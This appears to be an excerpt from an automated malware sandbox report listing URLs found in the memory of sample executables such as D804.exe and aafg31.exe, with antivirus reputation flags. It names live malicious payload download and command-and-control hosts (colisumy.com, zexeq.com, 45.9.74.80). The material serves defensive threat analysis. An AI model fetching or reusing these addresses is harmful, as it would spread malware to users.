                                        http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806Ctrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://188.34.154.187:30303/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://45.9.74.80/0bjdn2Z/index.phptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://ss.apjeoighw.com/check/?sid=436336&key=3f9d01718af2d5daf3c654f2052d5bc7false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://colisumy.com/dl/build.exetrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=truetrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://ss.apjeoighw.com/check/safefalse
                                        • URL Reputation: safe
                                        unknown
                                        http://colisumy.com/dl/build2.exetrue
                                        • URL Reputation: malware
                                        unknown
                                        https://api.2ip.ua/geo.jsonfalse
                                          high
                                          http://188.34.154.187:30303/e44c96dfdf315ccf17cdd4b93cfe6e48false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ss.apjeoighw.com/check/?sid=436234&key=2cef0d99b721939135d08fea0dcaba52false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://45.9.74.80/0bjdn2Z/index.php?scr=1true
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://toobussy.com/tmp/true
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://ladogatur.ru/tmp/true
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2Ffalse
                                            high
                                            http://zexeq.com/files/1/build3.exetrue
                                            • URL Reputation: safe
                                            unknown
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://static.xx.fbcdn.net/rsrc.php/v3/y-/l/0aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644310592.000001E292380000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/v75M7CPu9-P.js?_nc_x=Ij3Wp8lg5Kzaafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://steamcommunity.com/profiles/76561199508624021update.zipopenopen_NULL%sbuild2.exe, 00000018.00000002.478126519.0000000000840000.00000040.00001000.00020000.00000000.sdmpfalse
                                                  high
                                                  https://messenger.com/aafg31.exe, 00000015.00000003.616407141.000001E2922BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616875927.000001E2922D3000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://zexeq.com/files/1/build3.exelD804.exe, 00000013.00000002.636070288.000000000320F000.00000004.00000020.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://static.xx.fbcdn.net/rsrc.php/v3/yL/r/camCPYrr6r7.js?_nc_x=Ij3Wp8lg5Kzaafg31.exe, 00000015.00000003.616407141.000001E2922BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617256768.000001E292290000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.536338668.000001E292285000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616875927.000001E2922D3000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922D6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.536309898.000001E292289000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558924559.000001E292285000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617144495.000001E292287000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644310592.000001E292380000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://colisumy.com/dl/build2.exe$runD804.exe, 00000013.00000002.619178225.00000000006AF000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://ss.apjeoighw.com/aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://colisumy.com/dl/build2.exerun3D804.exe, 00000013.00000002.619178225.000000000062B000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://t.me/looking_glassbotlookataddon.zipMozilla/5.0build2.exe, 00000018.00000002.478126519.0000000000840000.00000040.00001000.00020000.00000000.sdmpfalse
                                                        high
                                                        https://we.tl/t-tnzomMj6D804.exe, 00000013.00000002.619178225.00000000006BB000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.reddit.com/D804.exe, 00000013.00000003.475323189.00000000032B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          high
                                                          https://api.2ip.ua/geo.jsonyY&$D804.exe, 00000010.00000002.619429561.0000000000808000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://api.2ip.ua/uD804.exe, 00000013.00000003.452681314.0000000000647000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.000000000062B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://ss.apjeoighw.com/check/safe3aafg31.exe, 00000015.00000002.642437211.000001E292275000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=trueQ58D804.exe, 00000013.00000002.619178225.00000000006AF000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://api.2ip.ua/geo.jsonVD804.exe, 00000013.00000002.619178225.00000000005F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yP/l/0aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groovexplorer.exe, 00000001.00000000.378821866.00007FFC1B439000.00000002.00000001.01000000.00000005.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://ss.apjeoighw.com/check/safe)aafg31.exe, 00000015.00000002.642437211.000001E292275000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://ss.apjeoighw.com:80/check/safeaafg31.exe, 00000015.00000003.539647639.000001E2901A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kzaafg31.exe, 00000015.00000003.559161122.000001E2901D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://ss.apjeoighw.com/check/safe1Baafg31.exe, 00000015.00000002.618169870.000001E2900FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://api.2ip.ua/geo.jsonG.SD804.exe, 00000006.00000002.450438133.0000000000707000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://zexeq.com/files/1/build3.exe$runZTD804.exe, 00000013.00000002.619178225.0000000000680000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://zexeq.com/raud/get.phpepD804.exe, 00000010.00000002.619429561.0000000000808000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.0000000000680000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://api.2ip.ua/?D804.exe, 00000013.00000003.452681314.0000000000647000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.000000000062B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.youtube.com/D804.exe, 00000013.00000003.475594980.00000000032B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://api.2ip.ua/geo.json1A170.exe, 0000001D.00000002.490407985.00000000008D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yB/l/0aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://jp.imgjeoighw.com/sts/image.jpgOaafg31.exe, 00000015.00000002.618169870.000001E2900FB000.00000004.00000001.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://static.xx.fbcdn.net/rsrc.php/v3/yI/r/Ib90vcVxYzI.js?_nc_x=Ij3Wp8lg5Kzaafg31.exe, 00000015.00000003.559161122.000001E2901D6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617144495.000001E292287000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.643446636.000001E29228C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://toobussy.com/aafg31.exe, 00000015.00000003.616407141.000001E2922EB000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://api.2ip.ua/geo.jsonAA170.exe, 0000001D.00000002.490407985.00000000008D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://static.xx.fbcdn.net/rsrc.php/v3/yK/l/0aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644310592.000001E292380000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/A-4As8UDAZ8.js?_nc_x=Ij3Wp8lg5Kzaafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://static.xx.fbcdn.net/rsrc.php/v3/y4/r/ZZnKfYusN8Z.js?_nc_x=Ij3Wp8lg5Kzaafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.groexplorer.exe, 00000001.00000000.378821866.00007FFC1B439000.00000002.00000001.01000000.00000005.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.amazon.com/D804.exe, 00000013.00000003.474950384.00000000032B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://zexeq.com/files/1/build3.exe$runD804.exe, 00000013.00000002.619178225.0000000000680000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.00000000006AF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                            • URL Reputation: malware
                                                                                            unknown
                                                                                            http://www.twitter.com/D804.exe, 00000013.00000003.475504479.00000000032B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.openssl.org/support/faq.htmlD804.exe, 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/ErrorD804.exe, 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, B46F.exe, 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, B46F.exe, 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A170.exe, 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                low
                                                                                                https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/Kp9IMjEGN_T.js?_nc_x=Ij3Wp8lg5Kzaafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/yWg6mkUCjYR.js?_nc_x=Ij3Wp8lg5Kzaafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://ss.apjeoighw.com/blob:aafg31.exe, 00000015.00000003.539122814.000001E2901D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://api.2ip.ua/geo.jsonqD804.exe, 00000013.00000003.452681314.0000000000647000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://api.2ip.ua/geo.jsons913F.exe, 00000025.00000002.514716181.0000000000667000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://static.xx.fbcdn.net/rsrc.php/v3/yq/l/0aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644310592.000001E292380000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0D804.exe, 00000013.00000002.619178225.00000000006AF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F011280Nkx%D804.exe, 00000010.00000002.619429561.0000000000891000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          http://www.nytimes.com/D804.exe, 00000013.00000003.475283762.00000000032B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644310592.000001E292380000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://api.2ip.ua/B46F.exe, 0000001A.00000002.489404633.0000000000687000.00000004.00000020.00020000.00000000.sdmp, A170.exe, 0000001D.00000003.488086932.0000000000939000.00000004.00000020.00020000.00000000.sdmp, A170.exe, 0000001D.00000002.490407985.0000000000939000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://t.me/looking_glassboeLbuild2.exe, 00000018.00000002.478487593.00000000008C8000.00000040.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxaafg31.exe, 00000015.00000003.617144495.000001E292287000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.643446636.000001E29228C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://api.2ip.ua/geo.json#&D804.exe, 00000010.00000003.452471512.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dllbuild2.exe, 00000018.00000002.478126519.0000000000840000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://ss.apjeoighw.com:80/check/?sid=436234&key=2cef0d99b721939135d08fea0dcaba52G_aafg31.exe, 00000015.00000003.569051255.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.566066441.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.563228419.000001E2901A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/sczXDyPA0UL.js?_nc_x=Ij3Wp8lg5Kzaafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.wikipedia.com/D804.exe, 00000013.00000003.475541394.00000000032B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://we.tl/t-tnzomMj6HUD804.exe, 00000010.00000002.619429561.0000000000891000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.636070288.00000000031DB000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.0000000000680000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.00000000006AF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                        • Avira URL Cloud: safe
